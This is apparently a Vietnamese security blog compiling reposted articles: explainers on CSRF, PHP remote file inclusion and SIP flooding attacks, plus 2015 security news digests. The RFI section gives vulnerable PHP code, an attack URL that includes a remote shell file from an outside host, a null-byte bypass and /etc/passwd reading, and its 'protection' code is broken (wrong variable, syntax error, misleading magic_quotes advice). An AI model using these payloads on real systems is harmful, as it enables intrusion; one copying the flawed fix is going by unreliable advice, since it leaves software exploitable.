Thứ Ba, 22 tháng 9, 2015

Bài viết hacking

1. Kỹ thuật Tấn công CSRF - Mượn gió bẻ măng.

Cross-site Request Forgery (CSRF) là kỹ thuật tấn công bằng cách sử dụng quyền chứng thực của người dùng đối với một website. CSRF là kỹ thuật tấn công vào người dùng, dựa vào đó hacker có thể thực thi những thao tác phải yêu cầu sự chứng thực.

KỸ THUẬT TẤN CÔNG CSRF

Để hiểu rõ hơn về CSRF, ta xét một ví dụ sau:
Dịch vụ Internet Banking của một ngân hàng có chức năng chuyển tiền giữa các tài khoản. Đường link chuyển tiền từ tài khoản A sang tài khoản B có dạng:
trong đó sender là người gửi tiền, receiver là người nhận tiền và amount là số tiền chuyển. Hiển nhiên là đường link này chỉ được người A thực thi, vì thế nên phải có một thao tác kiểm tra sender chính là người thực thi đường link.
Tuy vậy, bằng một cách nào đó, hacker lừa được A chạy đường link trên (có thể là chèn một iframe tới đường link này, tại bài viết trong một forum và lừa cho A đọc bài viết), thao tác xác thực được vượt qua và hacker có thể chuyển tiền từ A đến bất kỳ tài khoản nào.
Một ví dụ nữa, giả sử thao tác xóa bài viết trong một forum được thực hiện bằng link sau:
Thao tác này chỉ được thực hiện bởi tài khoản có quyền admin. Nếu lừa được admin chạy đường link trên, hacker có thể xóa bất kỳ bài viết nào mình muốn.

PHÒNG CHỐNG

Để ngăn chặn CSRF, có hai phương pháp thường được sử dụng:
  • Phương pháp đơn giản là chèn thêm token vào đường link thực hiện thao tác. Giá trị token này phải mạnh, khó đoán, thường là hash của session ID của user kết hợp với password, IP của user, thời điểm đăng nhập,…Mục đích của token là làm cho hacker không thể xác định được chính xác đường link thực hiện thao tác.
Ở ví dụ Internet Banking của ngân hàng trên, ta thêm một biến token vào, đường link chuyển tiền có dạng
Giá trị của biến token được sinh ra dựa trên những thông tin đặc trưng của user. Trong filesendfund.php sẽ có một hàm sinh ra token này và kiểm tra xem có khớp với giá trị token trên URL không, nếu không khớp thì thao tác chuyển tiền trên không được thực hiện.
Điểm yếu của phương pháp này là khi giá trị token bị lộ nó sẽ không còn tác dụng.
  • Chèn thêm bước xác nhận trung gian trước khi thực hiện các thao tác nhạy cảm: có thể là yêu cầu user nhập lại password để xác nhận thao tác của mình trước khi thực hiện hoặc sử dụng captchađể xác nhận.

facebook confirmFacebook yêu cầu nhập lại mật khẩu khi thực hiện những tác vụ nhạy cảm
Các dịch vụ thanh toán (ngân hàng, chứng khoán) thường yêu cầu user sử dụng thêm OTP (One-time password) hoặc chứng thư số để xác nhận lại các giao dịch.

Nguồn: tek

2.Remote file inclusion (RFI)
Remote file inclusion (RFI)
a)Giới thiệu nội dung chính :


Đây là một phương pháp hack lợi dụng hàm include() trong php để chèn vào một vài file nào đó.Thường nội dùng chèn vào file ta nên lấy từ 1 file txt nào đó chứa nội dung của một script shell.
Xem một mẫu RFI 
http://www.victim.com/index.php?page=home
Và đoạn script cho phép chèn 

<?php
$page = $_GET['page'];
include($page);
?>


Ở đây nếu biến $page đc khai báo toàn cục trong file cấu hình php.ini (register_global đc set on) thì đoạn script đc viết kiểu như sau

<?php
include($page);
?>


Giả sử victim là http://www.victim.com/index.php?page=home
ta có thể chỉ định cho home là nội dung của một con shell.Ví dụ như thế này.
http://www.victim.com/index.php?page=www.huynhdegroup.com/shell.txt?
Lúc này nội dung của con shell sẽ được chèn vào thay thế cho nội dung của trang home.
Điều kiện để có thể include nội dung từ một link khác này có thể thực hiện đc đó là trong cấu hình php.ini ,2 thuộc tính allow_url_open , allow_url_include đc set là ON.Chỉ khi 2 thuộc tính này đc set là On nó mới cho phép vịêc thực hiện include từ 1 url nào đó vào nội dung của site.Vậy thử suy nghĩ xem.Giả sử truờng hợ 2 thuộc tính này đc set với giá trị là OFF thì điều gì sẽ xảy ra.Và ta sẽ xử lí trường hợp này như thế nào?
- Điều xảy ra đó là ko thể include nội dung từ 1 url khác đc.
- Nhưng ta có thể lợi dụng lỗi này để xem một số file nhạy cảm khác nằm trong server của mình .Như xem nội dung của etc/passwd chẳng hạn --> phương pháp này gọi là Local File Inclusion .Chúng ta sẽ bàn về nó sau

b) Phương pháp bypass:

Đôi khi không phải lúc nào ta cũng thực hiện thành công ngay RFI.Ví dụ như trong đoạn script php.Coder cố gắng hạn chế RFI bằng các giới hạn file có thể include như sau.

<?php
$page = $_GET['page'];
include($page.".htm");
?>


Đoạn script này chỉ cho phép include những trang có đuôi là htm mà thôi.Đối với các kiểu liên quan đến loại file này ta thường dùng null byte bypass ()
Lúc này chúng ta sẽ sẽ include với mẫu như sau
http://www.victim.com/index.php?page=www.antiwhitehat.com/shell.txt

Nếu bạn nào từng upload shell php mà bị chặn file php hẳn cũng biết phương pháp này này.Với việc chèn thì mọi thứ sau nó sẽ ko đc tính đến .

c) Phương pháp Bảo vệ:

Đứng trên phương diện chống RFI ,chúng ta có thể để với mẫu như sau.Đọc script sẽ hiểu vì sao nó chống đc RFI nhé.

<?php
$page = $_GET['page'];
if(file_exists("pages/".$page) {
include($page);
}
?>


Hoặc để chống null-bypass ta có thể set thuộc tính magic_quotes_gpc=Off

Nguồn: hackingworld
























Thứ Năm, 10 tháng 9, 2015

Tấn công DDoS SIP

Giới thiệuGiao thức khởi tạo phiên SIP (SessionInitiation Protocol) là giao thức điều khiển báo hiệu thuộc lớp ứng dụng được sử dụng để thiết lập, duy trì và kết thúc các phiên multimedia hay các cuộc gọi qua mạng trên nền IP. Do sử dụng giao thức UDP nên SIP dễ dàng bị khai thác để thực hiện những cuộc tấn công DDoS. Hôm nay tôi sẽ giới thiệu cho các bạn về phương pháp tấn công này. 
Tổng quan về SIPNhững gói tin được sử dụng trong giao thức SIP được chia làm 2 loại:
- Gói tin yêu cầu :
  • INVITE: Khởi tạo một phiên
  • ACK: xác nhận rằng máy chạm đã nhận được gói tin phản hồi kết thúc cho yêu cầu invite 2xx, 3xx, 4xx, 5xx, 6xx.
  • BYE: yêu cầu kết thúc phiên
  • CANCLE:hủy yêu cầu đang nằm trong hàng đợi
  • REGISTER: người sử dụng dùng gói tin này để đăng ký với server
  • OPTIONS,INFO: xác định cấu hình, yêu cầu 1 số thông tin từ server

- Gói tin đáp ứng: 
  • 1xx - Information: gói tin mang thông tin chung
  • 2xx – Success: khởi tạo phiên thành công
  • 3xx – Redirect: Chuyển địa chỉ
  • 4xx – Client-Error: Yêu cầu không được đáp ứng
  • 5xx – Server-Error: Sự cố máy chủ
  • 6xx – Global-Failure: Sự cố toàn mạng

Giao thức SIP sử dụng các SIP Proxy (hay Proxy Server) như các thiết bị đầu cuối để chuyển tiếp các yêu cầu và trả lời.

Nguyên lý hoạt động của SIP giữa các SIP PROXY
  • Người gửi gửi yêu cầu INVITE đến PS(Proxy Server), sau đó PS sẽ chuyển tiếp gói tin đến người nhận
  • Người nhận gửi gói tin đáp ứng 200 OK


  • Người gửi gửi lại gói tin ACK và sau đó cuộc gọi sẽ diễn ra


  • Khi muốn kết thúc, 1 trong 2 bên sẽ gửi gói tin Bye đến bên kia


  • Bên còn lại trả lời bằng gói tin 200 OK và kết thúc phiên kết nối.


Click image for larger version. 

Name: SIP.jpg 
Views: 12 
Size: 34,6 KB 
ID: 4913


Kịch bản
  • Invite of death: Khi một yêu cầu INVITE được gửi để thiết lập cuộc gọi thì Proxy Server sẽ chuyển tiếp bản tin đó đồng thời duy trì kết nối cho sự thiết lập này cho đến khi kết nối bị hủy hoặc hết thời gian time out. Lợi dụng điều này Attacker thực hiện tấn công bằng cách gửi nhiều gói tin INVITE giả mạo. Đích đến của các cuộc tấn công này chính là các Proxy Server. Kết quả là Proxy Server còn “bận ” chuyển tiếp các gói tin giả mạo dẫn đến làm giảm hiệu năng của các Proxy, tệ hơn có thể gây ngập lụt, treo hệ thống và phải khởi động lại.
  • Legitimate Message Flooding: Kẻ tấn công sử dụng một tài khoản hợp lệ đăng nhập vào server SIP. Từ đó kẻ tấn công trực tiếp làm ngập lụt hệ thống bằng việc gửi nhiều yêu cầu hợp lệ. Tuy nhiên phương pháp này không an toàn do Server có thể lần ra kẻ tấn công từ tài khoản hợp lệ đó.
  • Invalid Message Flooding: Tương tự như phương pháp trên nhưng kẻ tấn công sẽ không sử dụng tài khoản hợp lệ mà trực tiếp gửi những yêu cầu không hợp lệ đến server khiến server tắc nghẽn và không có khả năng phục vụ những yêu cầu khác.
  • Spoofed Message: Kẻ tấn công có thể làm gián đoạn các phiên kết nối bằng việc gửi những yêu cầu kết thúc phiên BYE giả mạo đến một trong những người dùng tham gia vào phiên đi kèm với thông tin session hợp lệ. Hơn nữa kẻ tấn công còn có thể chiếm quyền điều khiển, chuyển hướng phiên truyền thông bởi những yêu cầu Re-Invite giả mạo. Tuy nhiên việc giả mạo thông tin về session sao cho đúng lại là một vấn đề khác.


Biện pháp phòng chống
  • Anti-Spoofing: Tạo danh sách các tài khoản hợp lệ có quyền truy cập, ở đây có 2 hình thức:
  • Block tất cả các yêu cầu của người sử dụng không có tài khoản hợp lệ, muốn truy cập thì người sử dụng phải đăng ký
  • Không block mà ưu tiên chuyển tiếp những yêu cầu của người sử dụng có tài khoản hợp lệ
  • Yêu cầu xác thực: Sau khi nhận được yêu cầu Invite thay vì chuyển tiếp gói tin PS sẽ gửi trả lại gói tin đáp ứng 407(yêu cầu xác thực) kèm theo 1 mã xác thực. Gói tin Invite chỉ được chuyển tiếp khi PS nhận được đúng mã xác thực tương ứng với địa chỉ ip gửi.
Nguồn: whitehat.vn

Thứ Tư, 9 tháng 9, 2015

Điểm tin An ninh mạng tháng 8/2015

Cổng thanh toán Nganluong.vn bị tấn công

Name:  WH8_1.jpg
Views: 21
Size:  15,7 KB

Ngày 04/08, cổng thanh toán trung gian cho nhiều website thương mại điện tử Việt Nam Nganluong.vn đã bị tấn công bởi tin tặc tự xưng "Hacker 6009" và upload file lạ lên website này. Đại diện Nganluong.vn xác nhận không có thông tin khác hàng nào bị ảnh hưởng.

Tin tặc tống tiền người dùng web ngoại tình Ashley Madison

Name:  WH8_2.jpg
Views: 13
Size:  67,1 KB

Vụ việc Ashley Madison bị tấn công đã mang lại không ít phiền toái khi hacker gửi mail tống tiền các nạn nhân. Hacker đã lấy được gần 10G dữ liệu người dùng, trong đó có đến 15.000 người dùng thuộc chính phủ Mỹ. Vụ việc chuyển biến phức tạp sau khi có 2 vụ tự sát liên quan tới việc này. 

Lỗ hổng nghiêm trọng trong BIND có thể làm tê liệt phần lớn mạng Internet

Name:  WH8_3.jpg
Views: 13
Size:  83,9 KB

Đầu tháng 8, lỗ hổng nghiêm trọng BIND - phần mềm máy chủ DNS được công bố. Đây là lỗi có thể làm tê liệt phần lớn mạng Internet ảnh hưởng tới nhiều phiên bản của BIND 9, từ BIND 9.1.0 đến BIND 9.10.2-P2. Hacker có thể lợi dụng lỗ hổng này để đánh sập các máy chủ DNS chạy phần mềm BIND sau khi tấn công từ chối dịch vụ.

Lỗ hổng Stagefright và Certifi-Gate trên thiết bị Android

Name:  WH8_4.jpg
Views: 13
Size:  32,9 KB

Trong tháng qua, 2 lỗ hổng Stagefright và Certifi-Gate là tâm điểm tại hội thảo Black Hat 2015. Đây là 2 lỗi nguy hiểm ảnh hưởng đến các thiết bị chạy hệ điều hành Android có thể bị hacker lợi dụng để chiếm quyền kiểm soát điện thoại và truy cập dữ liệu quan trọng.

Microsoft phát hành gói bản vá an ninh đầu tiên cho Windows 10

Name:  WH8_5.jpg
Views: 13
Size:  98,9 KB

Chỉ chưa đầy 2 tuần sau khi phát hành, hệ điều hành Windows 10 đã có gói bản vá an ninh đầu tiên. Trong 14 cập nhật an ninh tháng 8 cho các sản phẩm của Microsoft có tới 5 bản cập nhật dành cho Windows 10, và một cập nhật cho trình duyệt Edge - hệ điều hành mới nhất của hãng này.

Tập tin video MKV độc hại có thể crash điện thoại Android

Name:  WH8_6.jpg
Views: 13
Size:  129,3 KB

Một ứng dụng hoặc trang web độc hại có thể được sử dụng để crash thiết bị Android, do một lỗ hổng trong cách thành phần mediaserver của Android xử lý các tập tin định dạng MKV. Đây là thông tin được đưa ra đầu tháng 8. Tuy nhiên, phía Google cho biết hãng chưa thấy bất kỳ dấu hiệu khai thác nào của lỗ hổng này.

Nguồn: whitehat.vn

Điểm tin An ninh mạng tháng 5/2015


Email giả thông báo của Thủ tướng chứa mã độc được điều khiển qua domain Trung Quốc

Name:  01_ban tin5.jpg
Views: 547
Size:  28,5 KB
Đầu tháng 6, Bkav nhận được thông báo về 2 email “đáng ngờ” có tiêu đề liên quan tới nội dung quan trọng như kết luận của Thủ tướng hay Hội nghị TW 11. Kết quả phân tích của Bkav cho thấy email này chứa backdoor có thể nhận lệnh điều khiển từ xa, cho phép tin tặc thu thập dữ liệu, ghi các thao tác bàn phím (keylogger), chụp màn hình… trên máy nạn nhân. Mã độc được điều khiển qua domain từ Trung Quốc.

Mẫu nhận diện mã độc này đã được cập nhật vào phiên bản mới nhất của phần mềm Bkav.

Hơn 1.000 website Việt Nam bị tin tặc Trung Quốc tấn công

Name:  02_ban tin5.jpg
Views: 377
Size:  52,1 KB

Những ngày cuối tháng 5, đầu tháng 6, hơn 1.000 website Việt Nam bị tấn công, trong đó có 140 site .edu.vn và 28 site .gov.vn. Vụ việc diễn ra cùng thời điểm Đối thoại Shangri-La 2015 đang diễn ra với vấn đề “nóng” nhất liên quan đến tranh chấp tại Biển Đông giữa các nước Asean và Trung Quốc.

Nhóm hacker Naikon khai thác lỗ hổng cũ tấn công các nước Châu Á – Thái Bình Dương

Name:  05_ban tin5.jpg
Views: 380
Size:  47,5 KB

Suốt nhiều năm, nhóm hacker Naikon đã thành công trong khai thác các lỗ hổng cũ để xâm nhập vào các tổ chức quốc gia tại một số nước Châu Á – Thái Bình Dương, trong đó có Việt Nam. Theo các chuyên gia, mục tiêu chính của nhóm tin tặc Trung Quốc này là cơ quan chính phủ cấp cao, các tổ chức quân và dân sự.

Bộ 3 hacker chuyên đánh cắp tài khoản thẻ tín dụng bị bắt giữ

Name:  04_ban tin5.jpg
Views: 377
Size:  79,4 KB

Ngày 14/5, 3 đối tượng đều là kỹ sư Công nghệ Thông tin bị PC50, Công an Hà Nội bắt giữ về hành vi sử dụng mạng máy tính tấn công vào các website nhằm lấy cắp thông tin thẻ tín dụng của khách hàng. Số tiền thu được của nhóm hacker từ bán thông tin của khách hàng lên tới 400 triệu đồng.

Hàng chục nghìn website HTTPS có nguy cơ bị tấn công qua lỗ hổng Logjam

Name:  03_ban tin5.jpg
Views: 375
Size:  52,5 KB

Lỗ hổng an ninh nghiêm trọng Logjam được phát hiện liên quan đến thuật toán tạo khóa chia sẻ an toàn sử dụng trong giao thức HTTPS, SSH, IPsec, SMTPS và các giao thức dựa trên TLS khác.. Khai thác Logjam, tin tặc có thể tấn công nghe lén khi người dùng truy cập các dịch vụ quan trọng như giao dịch ngân hàng, chứng khoán, mua sắm trực tuyến...

Nguồn: whitehat.vn

Điểm tin An ninh mạng tháng 4/2015


Trung Quốc bị tố do thám các nước Đông Nam Á

Name:  WH1.jpg
Views: 215
Size:  23,2 KB

Báo cáo của FireEye về những vụ tấn công gián điệp, theo dõi chính phủ các nước Đông Nam Á, trong đó có Việt Nam là điểm nóng trong tháng qua. Nói về vụ việc này, chuyên gia Bkav cho biết các hình thức gián điệp tương tự đã xảy ra từ nhiều năm trước đây. 

Facebook bị điều tra về xâm phạm quyền riêng tư của người dùng

Name:  WH2.jpg
Views: 214
Size:  7,4 KB

Trong tháng qua, trang mạng xã hội Facebook “dính” vào vụ việc liên quan tới quyền riêng tư của người dùng khi bị cáo buộc theo dõi người dùng ngay cả khi không sử dụng và trở thành đối tượng điều tra về xâm phạm quyền riêng tư cơ quan bảo vệ dữ liệu ở năm quốc gia thuộc Liên minh châu Âu (EU). 

Mạng botnet Simda và Beebone bị đánh sập 
Name:  WH3.jpg
Views: 216
Size:  82,7 KB

Sử dụng mạng botnet thực hiện tấn công vẫn là hình thức được tội phạm mạng ưa chuộng và đây cũng là mục tiêu điều tra của các cơ quan thực thi pháp luật. Trong tháng 4/2015, Interpol giải phóng 770.000 máy tính khỏi mạng botnet Simda. Chỉ vài ngày sau đó, mạng botnet Beebone cũng đã bị đánh sập trong chiến dịch của cảnh sát quốc tế. 

Lỗ hổng cho phép gỡ video và sao chép comment trên YouTube
Name:  wh4.png
Views: 215
Size:  40,3 KB

2 lỗ hổng trên YouTube là chủ đề nhận được nhiều quan tâm trên Whitehat.vn trong tháng qua. Đây là các lỗ hổng cho phép gỡ video và sao chép bình luận (comment) của video này sang video khác. Google đã đưa ra bản vá kịp thời cho các lỗi này. 

IPhone 5C “khoá mạng Nhật” âm thầm rút tiền người dùng

Name:  WH5.jpg
Views: 217
Size:  123,2 KB

Vụ việc người dùng IPhone 5C bị âm thầm trừ tiền đã thu hút sự chú ý của dư luận. Nguyên nhân của việc này được chỉ ra là do người dùng kích hoạt dịch vụ iMessage và FaceTime. 

Lỗ hổng CVE-2015-2348AwSnap trên PHP, và Chrome
Name:  WH6.png
Views: 216
Size:  21,4 KB

Trong tháng tư, 2 lỗi khá nghiêm trọng thu hút được một lượng lớn độc giả trên WhiteHat.vn là CVE-2015-2348 tồn tại trên PHP cho phép tin tặc thực hiện tấn công và lỗ hổng AwSnap cho phép crash trình duyệt Chrome của hàng loạt người dùng. Diễn đàn WhiteHat.vn cũng có bài phân tích về lỗi CVE-2015-2348 trên PHP. 
TrueCrypt không chứa backdoor theo dõi người dùng

Name:  WH7.png
Views: 214
Size:  43,3 KB

Theo kết quả kiểm tra của NCC (hãng kiểm tra an ninh mạng tại Anh), phần mềm mã nguồn mở phổ biến trên thế giới hiện nay TrueCrypt đã được khẳng định không tồn tại lỗ hổng nghiêm trọng hoặc backdoor trong code phần mềm. 

Nguồn: whitehat.vn

Điểm tin An ninh mạng tháng 3/2015

Hàng nghìn website bị tấn công qua Shellshock, Bkav phát hành công cụ kiểm tra lỗ hổng

Name:  Shellshock.jpg
Views: 290
Size:  32,6 KB

Chiến dịch tấn công qua khai thác lỗ hổng Shellshock ảnh hưởng gần 10 nghìn website trên toàn thế giới. Trong đó, 90 website Việt Nam bị tấn công với 2 website .edu.vn. Bkav đã phát hành công cụ Shellshock Checker để hỗ trợ người dùng kiểm tra phát hiện lỗ hổng trên hệ thống của mình.

Lừa đảo trên Facebook thay đổi cách thức

Name:  2_Facebook.jpg
Views: 291
Size:  37,2 KB

Trong tháng 3, các hình thức lừa đảo bằng Facebook tiếp tục được tin tặc sử dụng, nhưng tinh vi và mới mẻ hơn. Kẻ xấu lừa người dùng đăng nhập vào địa chỉ Facebook giả mạo codefacebook.com hoặc giả mạo Facebook Messenger gửi đi những thông báo trúng thưởng hấp dẫn để đánh cắp thông tin tài khoản.

Ngoài ra, tin tặc còn giả mạo fanpage của những người nổi tiếng để đăng tải những thông tin giật gân, gây sốc nhằm câu like câu view cho một số website như duhoclodon.com, baophunu360.com…

Hai vụ việc trong tháng gây sóng dư luận của VNPT

Name:  3_VNPT.jpg
Views: 294
Size:  23,3 KB

Thiết bị modem của Tập đoàn Huawei Trung Quốc do VNPT cung cấp bị phát hiện không thể đổi được password dẫn tới nguy cơ lộ lọt thông tin khách hàng. Đại diện VNPT Hà Nội đã lên tiếng xác nhận và sẽ hỗ trợ khách hàng đổi password mặc định để đảm bảo an toàn.

Lỗi này tương đối nguy hiểm vì cho phép hacker kiểm soát toàn bộ hệ thống mạng từ bên ngoài nếu biết tài khoản mặc định này và truy cập, kiểm soát thiết bị.

Vụ thứ hai là việc một nhóm hacker có tên gọi DIE Group đã tung lên mạng thông tin về mã số, địa chỉ, số điện thoại... của 50.000 khách hàng của VNPT. Tuy nhiên, theo thông tin từ VNPT thì số lượng khách hàng bị rò rỉ thông tin chỉ có 10.000.

255 website Việt Nam bị ảnh hưởng bởi lỗ hổng nghiêm trọng Freak SSL

Name:  4_Freak.jpg
Views: 290
Size:  44,8 KB

Lỗ hổng an ninh nghiêm trọng được phát hiện trên giao thức mã hóa Secure Sockets Layer/Transport Layer 
Security (SSL/TLS), khiến người dùng các thiết bị của Google và Apple có thể bị tấn công khi truy cập các trang HTTPS, thường là các dịch vụ quan trọng. Tại Việt Nam, 255 website bị ảnh hưởng, trong đó có 6 website ngân hàng, chứng khoán, 4 website hãng viễn thông, 5 website chính phủ…

Hiện tại, Apple, Google và Microsoft đã phát hành bản cập nhật vá lỗ hổng này.

Lỗ hổng trong Plugin 'WordPress SEO by Yoast' ảnh hưởng hàng triệu website

Name:  5_Wordpress.jpg
Views: 292
Size:  66,3 KB

Một lỗ hổng nghiêm trọng có tên ‘WordPress SEO by Yoast’ được phát hiện trên hầu hết các phiên bản plugin của nền tảng quản lý nội dung (CMS) WordPress, khiến hàng chục triệu website rơi vào nguy cơ bị tấn công. Để được an toàn, quản trị hệ thống nên cập nhật bản vá từ nhà sản xuất.

App Store, iTunes gặp sự cố bất thường do "lỗi kỹ thuật"

Name:  6_AppleiTune.jpg
Views: 292
Size:  50,8 KB

Các dịch vụ iTunes và App Store của Apple gặp sự cố kéo dài một cách bất thường (hơn 12 giờ đồng hồ) vào đầu tháng 3/2015. Kết quả là nhiều người dùng không thể truy cập được các dịch vụ này. Apple tuyên bố sự cố này là do một lỗi kỹ thuật nội bộ và đã được khắc phục sau đó.

Lỗ hổng cho phép mã độc STUXNET khai thác được vá hoàn toàn sau 4 năm

Name:  7_Stuxnet.jpg
Views: 290
Size:  27,0 KB

Một lỗ hổng nghiêm trọng cho phép tấn công bằng mã độc STUXNET cũng được Microsoft phát hành bản vá trong bản cập nhật ngày thứ Ba định kỳ của hãng.

Lỗ hổng được cho là đã vá từ năm 2010. Tuy nhiên, 4 năm sau, một nhóm nghiên cứu của HP phát hiện rằng bản vá không toàn diện, khiến cho lỗ hổng vẫn có thể được khai thác trong suốt thời gian qua. Hiện tại lỗ hổng đã được vá hoàn toàn.

Nguồn: whitehat.vn